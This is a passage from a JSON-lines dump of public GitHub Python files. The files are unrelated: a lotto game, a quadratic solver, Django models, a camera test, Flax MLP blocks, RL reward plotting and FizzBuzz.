IPs.query.count() == 0:\n for i in range(20):\n number = setIPnumber()\n value = random.randint(50, 80)\n question = IPs(number=number, value=value)\n db.session.add(question)\n db.session.commit()\n for i in range(20):\n number = setIPnumber()\n value = random.randint(60, 90)\n question = IPs(number=number, value=value, isDanger=True)\n db.session.add(question)\n db.session.commit()\n\n\nsetIPs()\n","repo_name":"chetTEst/CyberSecuLab","sub_path":"lesson 2.1.2/flask_app/app/SetTasks.py","file_name":"SetTasks.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42683605412","text":"import random\nlotto1=random.randint(1,61)\nlotto2=random.randint(1,61)\nlotto3=random.randint(1,61)\nlotto4=random.randint(1,61)\nlotto5=random.randint(1,61)\nprint(\"estratti\",lotto1,lotto2,lotto3,lotto4,lotto5)\nnumero1=input(\"primo numero\")\nnumero2=input(\"secondo numero\")\nnumero3=input(\"terzo numero\")\nnumero4=input(\"quarto numero\")\nnumero5=input(\"quinto numero\")\n\nindovinati=0\nif numero1==lotto1 or numero1==lotto2 or numero1==lotto3 or numero1==lotto4 or numero1==lotto5:\n indovinati=indovinati+1\nif numero2==lotto1 or numero2==lotto2 or numero2==lotto3 or numero2==lotto4 or numero2==lotto5:\n indovinati=indovinati+1\nif numero3==lotto1 or numero3==lotto2 or numero3==lotto3 or numero3==lotto4 or numero3==lotto5:\n indovinati=indovinati+1\nif numero4==lotto1 or numero4==lotto2 or numero4==lotto3 or numero4==lotto4 or numero4==lotto5:\n indovinati=indovinati+1\nif numero5==lotto1 or numero5==lotto2 or numero5==lotto3 or numero5==lotto4 or numero5==lotto5:\n indovinati=indovinati+1\nprint(\"indovinati\",indovinati)\n\n\n","repo_name":"MarcoInc/Python_Exercises","sub_path":"Esercizi/Superenalotto.py","file_name":"Superenalotto.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11599310413","text":"from math import sqrt\ndef real_equal(a,b,c):\n root=(-b)/(2*a)\n print(\"Root is\")\n print(root)\n\ndef real_unequal(a,b,c):\n root1=(-(b+(sqrt((b*b)-(4*a*c)))))/(2*a)\n root2=(-(b-(sqrt((b*b)-(4*a*c)))))/(2*a)\n print(\"Roots are\\n\")\n print(root1)\n print(root2)\n\ndef condition_check(a,b,c):\n cond=((b**2)-(4*a*c))\n if(cond>0):\n print(\"Determinent is more then 0\\n\"+\"So roots are real and unequal\")\n real_unequal(a,b,c)\n if(cond==0):\n print(\"Determinent is equal to 0\\n\"+\"So roots are real and equal\")\n real_equal(a,b,c)\n if(cond<0):\n print(\"Determinent is less then 0\\n\"+\"So roots are imaginary\")\n\nif __name__ == '__main__':\n print(\"All quadratic equation is in form ax2+bx+c=0\\n\"+\"To find roots of quadratic equation we need a,b,c values\")\n try:\n a = int(input(\"Enter value of a :\"))\n b = int(input(\"Enter value of b :\"))\n c = int(input(\"Enter value of c :\"))\n except:\n print(\"Enter correct values\")\n exit()\n if(a == 0):\n print(\"It's not a quadratic equation\")\n exit()\n condition_check(a,b,c)\n","repo_name":"harshareddy794/Python-scripts","sub_path":"Quadratic equation solver/ Quadratic_equation_solver.py","file_name":" Quadratic_equation_solver.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9755049096","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom datetime import datetime\nfrom django.conf import settings\nimport os,datetime\nfrom django.utils import timezone\nfrom dashboard.models import TeamEvent\n\n\n#from events.models import Event\ndef upload_handler(model_name):\n def upload_func(instance, filename):\n return os.path.join(model_name, instance.title, filename)\n return upload_func\nBRANCH_CHOICES = (\n ('School','School'),\n ('Arts', 'Arts'),\n ('Accounting', 'Accounting'),\n ('Applied Mechanics', 'Applied Mechanics'),\n ('Mechatronics', 'Mechatronics'),\n ('Aerospace Engineering', 'Aerospace Engineering'),\n ('Automobile Engineering', 'Automobile Engineering'),\n ('Biotech / Biochemical / Biomedical', 'Biotech / Biochemical / Biomedical'),\n ('Biology', 'Biology'),\n ('Ceramic Engineering', 'Ceramic Engineering'),\n ('Chemical Engineering', 'Chemical Engineering'),\n ('Chemistry', 'Chemistry'),\n ('Design', 'Design'),\n ('Engineering Design', 'Engineering Design'),\n ('Civil Engineering', 'Civil Engineering'),\n ('Computer Science and Engineering', 'Computer Science and Engineering'),\n ('Electronics and Communications Engineering', 'Electronics and Communications Engineering'),\n ('Electrical and Electronics Engineering', 'Electrical and Electronics Engineering'),\n ('Electrical Engineering', 'Electrical Engineering'),\n ('Electronics and Instrumentation Engineering', 'Electronics and Instrumentation Engineering'),\n ('Engineering Physics', 'Engineering Physics'),\n ('Economics', 'Economics'),\n ('Fashion Technology', 'Fashion Technology'),\n ('Humanities and Social Sciences', 'Humanities and Social Sciences'),\n ('Industrial Production', 'Industrial Production'),\n ('Production', 'Production'),\n ('Information Technology and Information Science', 'Information Technology and Sciences'),\n ('Management', 'Management'),\n ('Manufacturing', 'Manufacturing'),\n ('Mathematics', 'Mathematics'),\n ('Metallurgy and Material Science', 'Metallurgy and Material Science'),\n ('Mechanical Engineering', 'Mechanical Engineering'),\n ('Ocean Engineering and Naval Architecture', 'Ocean Engineering and Naval Architecture'),\n ('Physics', 'Physics'),\n ('Telecom', 'Telecom'),\n ('Textile Engineering', 'Textile Engineering'),\n ('Others', 'Others'),\n)\n\nGENDER_CHOICES = (('M', 'Male'), ('F', 'Female'))\n\nSTATE_CHOICES = (\n ('Andhra Pradesh', 'Andhra Pradesh'),\n ('Arunachal Pradesh', 'Arunachal Pradesh'),\n ('Assam', 'Assam'),\n ('Bihar', 'Bihar'),\n ('Chhattisgarh', 'Chhattisgarh'),\n ('Goa', 'Goa'),\n ('Gujarat', 'Gujarat'),\n ('Haryana', 'Haryana'),\n ('Himachal Pradesh', 'Himachal Pradesh'),\n ('Jammu And Kashmir', 'Jammu And Kashmir'),\n ('Jharkhand', 'Jharkhand'),\n ('Karnataka', 'Karnataka'),\n ('Kerala', 'Kerala'),\n ('Madhya Pradesh', 'Madhya Pradesh'),\n ('Maharashtra', 'Maharashtra'),\n ('Manipur', 'Manipur'),\n ('Meghalaya', 'Meghalaya'),\n ('Mizoram', 'Mizoram'),\n ('Nagaland', 'Nagaland'),\n ('Orissa', 'Orissa'),\n ('Punjab', 'Punjab'),\n ('Rajasthan', 'Rajasthan'),\n ('Sikkim', 'Sikkim'),\n ('Tamil Nadu', 'Tamil Nadu'),\n ('Tripura', 'Tripura'),\n ('Uttar Pradesh', 'Uttar Pradesh'),\n ('Uttarakhand', 'Uttarakhand'),\n ('West Bengal', 'West Bengal'),\n ('Andaman And Nicobar Islands', 'Andaman And Nicobar Islands'),\n ('Chandigarh', 'Chandigarh'),\n ('Dadra And Nagar Haveli', 'Dadra And Nagar Haveli'),\n ('Daman And Diu', 'Daman And Diu'),\n ('Lakshadweep', 'Lakshadweep'),\n ('NCT/Delhi', 'NCT/Delhi'),\n ('Puducherry', 'Puducherry'),\n ('Outside India', 'Outside India'),\n)\n\nRATING_CHOICES = (('1', '1-Very Bad'), ('2', '2-Bad'), ('3', '3-Good'), ('4', '4-Very Good'), ('5', '5-Excellent'),\n)\nSOURCE_CHOICES = (('Facebook', 'Facebook'),('Twitter','Twitter'),('IIT Madras Website','IIT Madras Website'),('Newspaper ad','Newspaper ad'),('I have been a regular Shaastra visitor','I have been a regular Shaastra visitor'),('I am an IITM student','I am an IITM student'),('Other','Other')\n)\nclass College(models.Model):\n\n name = models.CharField(max_length=255,\n help_text='The name of your college. Please refrain from using short forms.'\n )\n city = models.CharField(max_length=30,\n help_text='The name of the city where your college is located. Please refrain from using short forms.'\n )\n state = models.CharField(max_length=40, choices=STATE_CHOICES,\n help_text='The state where your college is located. Select from the drop down list'\n )\n\n def __unicode__(self):\n return '%s, %s, %s' % (self.name, self.city, self.state)\n\n class Admin:\n\n pass\n\nclass UserProfile(models.Model):\n\n user = models.ForeignKey(User, unique=True)\n gender = models.CharField(max_length=1, choices=GENDER_CHOICES,\n default='F') # Defaults to 'girl' ;-)\n age = models.IntegerField(default=18)\n # help_text='You need to be over 12 and under 80 years of age to participate'\n # No age limit now.\n branch = models.CharField(max_length=50, choices=BRANCH_CHOICES,\n help_text='Your branch of study')\n mobile_number = models.CharField(max_length=15, blank=True, null=True,\n help_text='Please enter your current mobile number')\n college = models.ForeignKey(College, null=True, blank=True)\n college_roll = models.CharField(max_length=40, null=True)\n\n shaastra_id = models.CharField(max_length = 20, unique = True, null=True)\n\n activation_key = models.CharField(max_length=40, null=True)\n key_expires = models.DateTimeField(default = timezone.now()+datetime.timedelta(2))\n want_accomodation = models.BooleanField(default=False, help_text = \"Doesn't assure accommodation during Shaastra.\")\n school_student = models.BooleanField(default=False)\n is_core = models.BooleanField(default=False)\n is_hospi = models.BooleanField(default=False)\n\n# facebook_id = models.CharField(max_length=20)\n# access_token = models.CharField(max_length=250)\n def save(self, *args, **kwargs):\n self.user.save()\n super(UserProfile, self).save(*args, **kwargs)\n \n def delete(self, *args, **kwargs):\n self.user.delete()\n super(UserProfile, self).delete(*args, **kwargs)\n \n def __unicode__(self):\n return self.user.first_name\n \n def get_regd_events(self):\n tevlist = []\n tevlist=TeamEvent.objects.filter(users__username=self.user.username)\n #TODO: return events with TDP first!! sort by has_tdp\n return tevlist\n \n def no_regd_events(self):\n return len(self.get_regd_events())\n \n class Admin:\n pass\n\n\n \nclass shows_updates(models.Model):\n shows_name = models.CharField(max_length=255,\n help_text='Name of the Show'\n )\n update = models.CharField(max_length=255,help_text='Update field')\n def __unicode__(self):\n return '%s %s'%(self.show_name,self.update)\n class meta:\n ordering=['-id']\n \nEVENT_CATEGORIES = (\n ('Aerofest', 'Aerofest'),\n ('Coding', 'Coding'),\n ('Design and Build', 'Design and Build'),\n ('Involve', 'Involve'),\n ('Quizzes', 'Quizzes'),\n ('Online', 'Online'),\n ('Department Flagship', 'Department Flagship'),\n ('Spotlight', 'Spotlight'),\n ('Workshops', 'Workshops'),\n ('Exhibitions', 'Exhibitions and Shows'),\n ('Associated Events', 'Associated Events'),\n ('Sampark', 'Sampark'),\n )\n\nUPDATE_CATEGORY = (\n ('Major Update', 'Major Update'),\n ('Updates', 'Updates'),\n )\n\nclass Tag(models.Model):\n name = models.CharField(max_length=25)\n\n def __unicode__(self):\n return self.name\n \nclass feedbackmodel(models.Model):\n\thow_comprehensive_was_the_information_in_the_website= models.CharField(max_length=30, choices=RATING_CHOICES,default='2')\n\thow_did_you_find_the_navigation_in_the_website= models.CharField(max_length=30, choices=RATING_CHOICES,default='2')\n\tkindly_rate_the_theme_of_the_website= models.CharField(max_length=30, choices=RATING_CHOICES,default='2')\n\thow_did_you_come_to_know_of_Shaastra= models.CharField(max_length=30, choices=SOURCE_CHOICES,default = 'Facebook')\n\tany_other_suggestions= models.TextField(blank = True)\n\t\n\nclass SponsLogoUploads(models.Model):\n logo1 = models.FileField(upload_to=upload_handler('sponslogo'), blank=True, null=True)\n logo2 = models.FileField(upload_to=upload_handler('sponslogo'), blank=True, null=True)\n logo3 = models.FileField(upload_to=upload_handler('sponslogo'), blank=True, null=True)\n #more fields to be added when max number of uploads is known\n\n","repo_name":"ShaastraWebops/shaastra_temporary_mainsite","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25402752361","text":"import time\nfrom solve import solve\n# fin=open(\"solve.py\")\n# exec(fin.read())\n\ncnt=0\nwhile True:\n inname=\"io/\"+str(cnt)+\".in\"\n try:\n fin=open(inname,\"r\")\n except:\n break\n\n fout=open(\"act/\"+str(cnt)+\".out\",\"w\")\n\n t0=time.time()\n ok=1\n try:\n #solve.solve(fin,fout)\n solve(fin,fout)\n except:\n ok=0\n mt=time.time()-t0\n\n\n fin.close()\n fout.close()\n\n with open(\"act/\"+str(cnt)+\".info\",\"w\") as f:\n f.write(\"{:d} {:.4f}\\n\".format(ok, mt))\n\n cnt=cnt+1\n","repo_name":"czylabsonasa/tesztelek2","sub_path":"apps/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2692569838","text":"import cv2\nimport time\n\n\ndef gstreamer_pipeline(sensor_id=0, exposure=500000, capture_width=1280, capture_height=720, \n display_width=640, display_height=360, framerate=120, flip_method=0): \n\tpipeline = f\"nvarguscamerasrc sensor-id={sensor_id} exposuretimerange='{int(exposure)} {int(exposure)+1}' !\\\n\t\t\t\tvideo/x-raw(memory:NVMM), width=(int){capture_width}, height=(int){capture_height}, \\\n\t\t\t\tframerate=(fraction){framerate}/1 ! nvvidconv flip-method={flip_method} ! \\\n\t\t\t\tvideo/x-raw, width=(int){display_width}, height=(int){display_height}, format=(string)BGRx ! \\\n\t\t\t\tvideoconvert ! video/x-raw, format=(string)BGR ! appsink\"\n\treturn(pipeline)\n\n\ndef main():\n\tpipeline = gstreamer_pipeline(exposure=3.5E+4)\n\tprint(pipeline)\n\n\tcap = cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)\n\told_time = time.time()\n\t\n\tif cap.isOpened():\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\tret, frame = cap.read()\n\t\t\t\tnew_time = time.time()\n\t\t\t\tdt = new_time - old_time\n\t\t\t\told_time = new_time\n\t\t\t\tfps = 1/dt\n\t\t\t\tcv2.putText(frame, f'FPS {fps:.1f}', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, \n\t\t\t\t\t\t\tfontScale=0.8, color=(0, 255, 0), thickness=1, lineType=cv2.LINE_4) \n\t\t\t\tcv2.imshow(\"camera\", frame)\n\n\t\t\t\tk = cv2.waitKey(1)\n\t\t\t\tif k == 27 or k == ord('q'): break\n\t\t \n\t\tfinally:\n\t\t\tcap.release()\n\t\t\tcv2.destroyAllWindows()\n\telse:\n\t\tprint(\"Error: Unable to open camera\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"naoya1110/csi_camera_for_jetson_nano","sub_path":"camera_test.py","file_name":"camera_test.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9302868238","text":"import cv2\nfrom collections import defaultdict\nfrom math import log10\n\nenergy_threshold = 0.1\nmaxlen = 10\n\ndef cache_results(face_prediction, confidence, default_dict, energy, learning_rate):\n score = 0\n prev_score = 0\n prev_label = ''\n\n if(energy > energy_threshold):\n if(confidence > 60):\n values = default_dict.get(face_prediction, None)\n if (values is None):\n default_dict[face_prediction].append(confidence)\n else:\n i = getIndex(values, confidence)\n if(len(values) < maxlen):\n values.insert(i, confidence)\n else:\n if(confidence > values[-1]):\n del values[-1]\n values.insert(i, confidence)\n else:\n energy -= learning_rate * energy + 1\n energy -= 1\n else:\n for label, values in default_dict.items():\n size = len(values)\n score = 10*size + sum(values)/size\n # print(\"Score: %s\" %score +\" Label: %s\" %label + \" Size: %s\" %size)\n if(score > prev_score):\n prev_score = score\n prev_label = label\n return prev_label, prev_score, energy\n\ndef getIndex(values, confidence):\n index = 0\n for v in values:\n if(confidence <= v):\n index += 1\n else:\n break\n return index\n\ndef clearCache(face_prediction):\n return None\n\n# PSEUDO #\n#se energy > energy_threshold\n# se default_dict non ha face_prediction come Key\n# default_dict[face_prediction].append(confidence)\n\n# se default_dict ha già face_prediction come Key\n# estrai la lista di Value:confidence associata alla Key:face_prediction\n# se len(Values) < 10 allora inserisci confidence in posizione i [es. se confidence = 8 --> [14, 13, 10, i, 6, 4]]\n# altrimenti \n# se confidence > lastElement(Values)\n# allora elimina l'ultimo elemento in Values(il piu basso) e inserisci confidence in posizione i\n# altrimenti decrementa energy\n# decrementa energy\n\n#altrimenti \n# elimina da default_dict tutte le [Key:Values] per cui len(values) == 1\n# calcola lo score = (Sommatoria(default_dict[Key].Values[i]))/len(Values)\n# memorizza la coppia [face_prediction, score] in scores_list\n# return face_prediction, score from max(score) in scores_list\n\n# ALTERNATIVA - fare l'append a fine lista e poi far il sorting per ogni etichetta\n","repo_name":"Basionkler/Sentry-Assistant","sub_path":"Sentry-Assistant/dict_create.py","file_name":"dict_create.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10480921385","text":"\n\n#A function to identify the original dir in R Studio\ndef identify_dir(collection, id_work, id_year, id_month, id_day):\n id_date = id_year + \"_\" + id_month + \"_\" + id_day\n work_location = \"collection/\" + collection + \"/\" + id_work\n date_location = id_work + \"_\" + id_year + \"/\" + id_work + \"_\" + id_year + \"_\" + id_month + \"/\" + id_work + \"_\" + id_date\n dirname = \"/data/user/l/pclanglais/\" + work_location + \"/\" + date_location\n return(dirname)\n\n# A class to store all the elements regarding the location of a doc.\nclass DocIndex(object):\n\n def __init__(self, collection, work, year, month, day, page):\n self.collection = collection\n self.work = work\n self.year = year\n self.month = month\n self.day = day\n self.page = page.split(\"_\")\n self.directory = identify_dir(collection, work, year, month, day)\n \n#doc_id = DocIndex(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6])\n\n\n# A class to store all the elements regarding a text block\nclass TextBlock(object):\n\n def __init__(self, id_text, id_line_word, line_text, content_text, coordinate_text, wc_text, size_text, font_text, font_style, begin_text, id_line, coordinate_line, height_block, width_block, hpos_block, vpos_block, style_block, shape_block, type_block, id_block, id_composed_block):\n self.id_text = id_text\n self.id_line_word = id_line_word\n self.line_text = line_text\n self.content_text = content_text\n self.coordinate_text = coordinate_text\n self.wc_text = wc_text\n self.size_text = size_text\n self.font_text = font_text\n self.font_style = font_style\n self.begin_text = begin_text\n self.id_line = id_line\n self.coordinate_line = coordinate_line\n self.height_block = height_block\n self.width_block = width_block\n self.hpos_block = hpos_block\n self.vpos_block = vpos_block\n self.style_block = style_block\n self.shape_block = shape_block\n self.type_block = type_block\n self.id_block = id_block\n self.id_composed_block = id_composed_block\n\n\n# A class to store all the elements regarding a text block\nclass DataAlto(object):\n\n def __init__(self, style, block_metadata, line_metadata, ocr_text, ngram):\n self.style = style\n self.block_metadata = block_metadata\n self.line_metadata = line_metadata\n self.ocr_text = ocr_text\n self.ngram = ngram\n\n","repo_name":"Pclanglais/PyAlto","sub_path":"parse_alto_class.py","file_name":"parse_alto_class.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72829591147","text":"import jsonlines\nimport matplotlib.pyplot as plt\nimport analysis.plot_paths as plot_spec\nimport numpy as np\nimport time\n\ndef load_results(path):\n r = jsonlines.open(path+\"norm_reward.jsonl\")\n base_reward = []\n reward = []\n batch_size = 100\n base_reward_temp = []\n reward_temp = []\n for line in r:\n base_reward_temp.append(line[\"base_reward\"])\n reward_temp.append(line[\"reward\"])\n if len(base_reward_temp) >= batch_size:\n base_reward.append(np.mean(base_reward_temp))\n base_reward_temp = []\n reward.append(np.mean(reward_temp))\n reward_temp = []\n\n\n test_reward = []\n sentences = []\n batch_size = 5\n base_reward_temp = []\n r = jsonlines.open(path + \"results.jsonl\")\n for line in r:\n base_reward_temp.append(line[\"reward\"])\n if len(base_reward_temp) >= batch_size:\n #sentences.append(line[\"sentence\"])\n test_reward.append(np.mean(base_reward_temp))\n base_reward_temp = []\n return base_reward,reward,test_reward,sentences\n\n\ndef create_plot(exp_cur):\n fig = plt.figure()\n base_line_train = exp_cur[0][1]\n base_line_test = exp_cur[0][2]\n st = fig.suptitle(exp_cur[0][0], fontsize=\"x-large\")\n #plt_base_reward = fig.add_subplot(221)\n #plt.ylim(4,10)\n plt_reward = fig.add_subplot(121)\n plt_test = fig.add_subplot(122,sharey=plt_reward)\n\n\n max_len = 0\n max_len_test = 0\n\n for exp in exp_cur[1:]:\n\n exp_path = exp[0]\n base_reward,reward,test_reward,sentences = load_results(exp_path)\n\n\n\n #plt_base_reward.set_title('Train base reward')\n #plt_base_reward.set_xlabel('Train Iteration')\n #plt_base_reward.set_ylabel('Reward')\n\n plt_reward.set_title('Train reward')\n plt_reward.set_xlabel('100 Train Iteration')\n\n plt_test.set_title('Reward (No dropout)')\n plt_test.set_xlabel('100 Train Iterations')\n #plt_test.set_ylabel('Loss')\n\n if len(reward) > max_len:\n max_len = len(reward)\n if len(test_reward) > max_len_test:\n max_len_test = len(test_reward)\n\n #plt_base_reward.plot(base_reward)\n plt_reward.plot(reward)\n plt_test.plot(test_reward,label=exp[1])\n\n base_line = np.array([base_line_train for i in range(max_len)])\n plt_reward.plot(base_line)\n #plt_base_reward.plot(base_line)\n\n base_line = np.array([base_line_test for i in range(max_len_test)])\n plt_test.plot(base_line)\n\n #fig.set_figheight(15)\n fig.set_figwidth(15)\n fig.legend(loc='center right')\n #plt.subplots_adjust(wspace=0.6,hspace=0.6)\n\n #plt.tight_layout(rect=[0,0,0.7,0.95])\n fig.savefig(\"fig/{}.png\".format(exp_cur[0][0].strip(\" \")),bbox_inches = \"tight\")\n print(\"Saved: fig/{}.png\".format(exp_cur[0][0].strip(\" \")))\n\n\nbase_path = \"/media/jonas/archive/master/data/rl_squad_sub/experiments/\"\n\nrank_rl_one_question = [\n (\"Rank Reward: Who else appeared with Beyonce in Telephone?\",0.333),\n (base_path + \"Transformer__12-18_16:02/\", \"Dropout 0.2\"),\n (base_path + \"Transformer__12-18_16:03/\", \"Dropout 0.3\"),\n]\n\nrecall_rl_one_question = [\n (\"Recall Reward: Who else appeared with Beyonce in Telephone?\",0.0606),\n (base_path + \"Transformer__12-18_18:41/\", \"Dropout 0.2 - debut else appeared with beyonce in telephone ?\"),\n (base_path + \"Transformer__12-18_18:42/\", \"Dropout 0.3 - who else performed with beyonce in telephone ?\"),\n]\n\n\nrecall_rl = [\n (\"Recall Reward Q2Q Transformer\",0.1867,0.2205),\n (\"/media/jonas/archive/master/data/rl_squad/cluster_exp/19_12_19/experiments/\" + \"RL_Transformer__12-18_21:12/\", \"Moving Avg\"),\n]\n\nrecall_rl = [\n (\"Recall Reward Q2Q Transformer\",0.726,0.766),\n (\"/media/jonas/archive/master/data/rl_squad/cluster_exp/19_12_19/experiments/\" + \"RL_Transformer__12-18_21:12/\", \"Moving Avg\"),\n]\n\nbase_path = \"/media/jonas/archive/master/data/rl_squad/experiments/\"\nrecall_one_question = [\n (\"Recall Reward One Question\",0.015,0.015),\n (base_path + \"Transformer__12-19_16:50/\", \"Dropout 0.2\"),\n (base_path + \"Transformer__12-19_21:48/\", \"Dropout 0.3\"),\n (base_path + \"Transformer__12-20_02:47/\", \"Dropout 0.4\"),\n (base_path + \"Transformer__12-20_08:02/\", \"Dropout 0.5\"),\n]\n\n\n\nbase_path = \"/media/jonas/archive/master/data/rl_squad/experiments/\"\nrank_one_question = [\n (\"Rank Reward One Question\",0.047619,0.047619),\n (base_path + \"Transformer__12-20_07:26/\", \"Dropout 0.2\"),\n (base_path + \"Transformer__12-20_15:09/\", \"Dropout 0.3\"),\n (base_path + \"Transformer__12-20_20:29/\", \"Dropout 0.4\"),\n (base_path + \"Transformer__12-21_01:49/\", \"Dropout 0.5\"),\n]\n\nbase_path = \"/media/jonas/archive/master/data/rl_squad/experiments/\"\nrank_squad_one_question = [\n (\"Rank Reward One Question SQuAD Transformer\",0.047619,0.047619),\n (base_path + \"Transformer__12-21_22:30/\", \"Dropout 0.2\"),\n (base_path + \"Transformer__12-22_03:01/\", \"Dropout 0.3\"),\n (base_path + \"Transformer__12-22_07:33/\", \"Dropout 0.4\"),\n (base_path + \"Transformer__12-22_12:33/\", \"Dropout 0.5\"),\n]\n\n\nplots = [\n recall_one_question,\n rank_one_question,\n rank_squad_one_question,\n #recall_rl\n]\n\nlive = True\n\nwhile live:\n for p in plots:\n create_plot(p)\n time.sleep(60)\n\nfor p in plots:\n create_plot(p)","repo_name":"Lyngsoe/AutomaticQueryReformulation","sub_path":"analysis/rl_plot2.py","file_name":"rl_plot2.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28523684979","text":"import traceback\ndef LeiaInt(msg):\n while True:\n try:\n n = int(input(msg))\n except (ValueError, TypeError):\n print('\\033[31mERRO: por favor, digite um número inteiro válido.\\033[m')\n continue\n except (KeyboardInterrupt):\n print('\\n\\033[31mUsuario preferio não digitar esse número. \\033[m')\n return 0\n else:\n return n\ndef LeiaFloat(msg):\n while not 'valor' in locals():\n try:\n valor = float(input(msg))\n except(TypeError, ValueError):\n print('\\033[31mERRO: Por favor, Digite um numero Real valido.\\033[m')\n continue\n except(KeyboardInterrupt):\n print('\\033[31mUsuario Preferiu não Digitar o numero:\\033[m')\n return 0\n else:\n return valor\n\n\ninteiro = LeiaInt('Digite um numero: ')\nreal = LeiaFloat('Digite um numero Real: ')\nprint(f'O numero inteiro foi {inteiro}\\nO numero Real foi {real}')\n","repo_name":"mathuesalexandre/cursoemvideo","sub_path":"exe.113.py","file_name":"exe.113.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28039379904","text":"\"\"\"Basic nn blocks.\"\"\"\n\nfrom rflax.types import Array, DType, Initializer, ActivationFn\nfrom rflax.components.initializers import kernel_default, bias_default\n\nfrom typing import Optional, Union, Sequence\n\nimport chex\nimport jax.numpy as jnp\nimport flax.linen as nn\n\n\ndef _convert_to_activation_fn(\n fn_or_string: Union[str, ActivationFn]) -> ActivationFn:\n if fn_or_string == \"linear\":\n return lambda x: x\n elif isinstance(fn_or_string, str):\n return getattr(nn, fn_or_string)\n elif callable(fn_or_string):\n return fn_or_string\n else:\n raise ValueError(\"Don't know how to convert %s to an activation function.\" %\n (fn_or_string,))\n\n@chex.dataclass(frozen=True)\nclass MlpConfig:\n dtype: DType = jnp.float32\n activations: str = \"relu\"\n intermediate_dim: int = 2048\n kernel_init: Initializer = kernel_default()\n bias_init: Initializer = bias_default()\n intermediate_dropout: float = 0.1\n final_dropout: Optional[float] = None\n\n\nclass MlpBlock(nn.Module):\n out_dim: int\n use_bias: bool\n config: MlpConfig\n\n @nn.compact\n def __call__(self,\n inp: Array,\n enable_dropout: bool = True) -> chex.ArrayDevice:\n config = self.config\n\n def dense(n_feats: int, name: str, inputs: Array,\n dropout: float) -> chex.ArrayDevice:\n x = nn.Dense(\n features=n_feats,\n use_bias=self.use_bias,\n dtype=config.dtype,\n kernel_init=config.kernel_init,\n bias_init=config.bias_init,\n name=name,\n )(inputs)\n return nn.Dropout(rate=dropout)(x, deterministic=not enable_dropout)\n\n for i, act_fn in enumerate(config.activations.split(\"-\")):\n dense_name = \"hidden\" if len(config.activations) == 1 else f\"hidden_{i}\"\n inp = dense(config.intermediate_dim, dense_name, inp,\n config.intermediate_dropout)\n inp = _convert_to_activation_fn(act_fn)(inp)\n\n return dense(\n self.out_dim,\n \"out\",\n inp,\n config.final_dropout if config.final_dropout else config.intermediate_dropout,\n )\n\n\nclass MultiOutputMlp(nn.Module):\n out_dim: Sequence[int]\n use_bias: bool\n config: MlpConfig\n\n @nn.compact\n def __call__(self,\n inp: Array,\n enable_dropout: bool = True) -> Sequence[Array]:\n config = self.config\n\n def dense(n_feats: int, name: str, inputs: Array,\n dropout: float) -> chex.ArrayDevice:\n x = nn.Dense(\n features=n_feats,\n use_bias=self.use_bias,\n dtype=config.dtype,\n kernel_init=config.kernel_init,\n bias_init=config.bias_init,\n name=name,\n )(inputs)\n return nn.Dropout(rate=dropout)(x, deterministic=not enable_dropout)\n\n for i, act_fn in enumerate(config.activations.split(\"-\")):\n dense_name = \"hidden\" if len(config.activations) == 1 else f\"hidden_{i}\"\n inp = dense(config.intermediate_dim, dense_name, inp,\n config.intermediate_dropout)\n inp = _convert_to_activation_fn(act_fn)(inp)\n\n outputs = []\n do_rate = (config.final_dropout\n if config.final_dropout else config.intermediate_dropout)\n for i, od in enumerate(self.out_dim):\n outputs.append(\n dense(od, \"out\" if len(self.out_dim) == 1 else f\"out_{i}\", inp,\n do_rate))\n\n return tuple(outputs)\n","repo_name":"gzqaq/rflax","sub_path":"rflax/components/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40123992560","text":"class Solution:\r\n def fizzBuzz(self, n):\r\n a = []\r\n for i in range(1, n + 1):\r\n if i % 3 == 0 and i % 5 == 0:\r\n a.append(\"FizzBuzz\")\r\n elif i % 3 == 0:\r\n a.append(\"Fizz\")\r\n elif i % 5 == 0:\r\n a.append(\"Buzz\")\r\n else:\r\n a.append(str(i))\r\n return a\r\n\r\n\r\nif __name__ == '__main__':\r\n sol = Solution()\r\n assert sol.fizzBuzz(1) == [\"1\"]\r\n","repo_name":"pangyouzhen/data-structure","sub_path":"math_/412 fizzBuzz.py","file_name":"412 fizzBuzz.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8296168013","text":"from simulation.classes.Lane import Lane\nfrom simulation.classes.World import World\nfrom simulation.classes.Car import Car\nfrom simulation.classes.Signal import Signal\nfrom simulation.classes.InductionCoil import InductionCoil\nfrom simulation.classes.Location import Location\nfrom simulation.classes.SignalManager import SignalManager\n\nfrom 